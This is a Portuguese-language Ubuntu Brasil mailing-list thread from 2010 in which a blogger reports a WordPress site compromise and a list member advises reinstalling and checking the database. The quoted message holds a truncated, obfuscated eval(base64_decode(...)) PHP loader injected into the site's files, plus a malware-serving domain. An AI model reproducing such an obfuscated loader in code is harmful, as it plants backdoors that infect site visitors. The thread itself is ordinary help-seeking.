Olá Paulo,
A chance de vc mesmo ter infectado seu wordpress é mínima, quase zero. O
mais provável é seu blog ter sido invadido e esse código malware ter
sido impantado lá. Reinstale o wordpress. Se continuar o problema,
analise o banco de dados, principalmente nos comentários.
Abraços e sucesso,
Nelson
On 05/08/2010 12:43 AM, Paulo Horácio wrote:
> só uso o ubuntu para editar/manejar um blog com plataforma wordpress
> hospedado em servidores da godaddy rodando linux; há um bom tempo que não
> mando nenhum arquivo pra lá, mas de repente percebo que ao entrar no blog
> uma página (nem sempre mas com frequencia) com domínio firesavez5.com é
> acessada e um .exe com vírus é solicitado a ser baixado. Todo arquivo .php
> está com um código que acredito ser o código malicioso (o código é enorme,
> coloquei pontinhos pra resumir)
>
> <?php /**/
> eval(base64_decode("aWYoZnVuY3R...................TlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
>
>
> Minha dúvida é:
> quais possibilidades existira deu ter infectado os arquivos do blog se só
> uso ubuntu pra mexer nos arquivos e inclusive acessar o ftp?
>
>
> Se alguém puder me dar uma dica também de como resolver isso agradeço. Até
> agora eu fiz o upload de todos arquivos do wordpress (2.9.2) e restaurei o
> tema original, todos eles estão sem o código acima, no entanto todos os .php
> dos plugins contém o código e o problema persiste. Será que vou ter que
> mexer no banco de dados? Essa é minha dúvida, tenho o WP Backup, plugin que
> faz backup do BD, mas não sei como devo proceder para um backup e
> restauração de banco de dados do mysql.
>
--
Mais sobre o Ubuntu em português: http://www.ubuntu-br.org/comece
Lista de discussão Ubuntu Brasil
Histórico, descadastramento e outras opções:
https://lists.ubuntu.com/mailman/listinfo/ubuntu-br
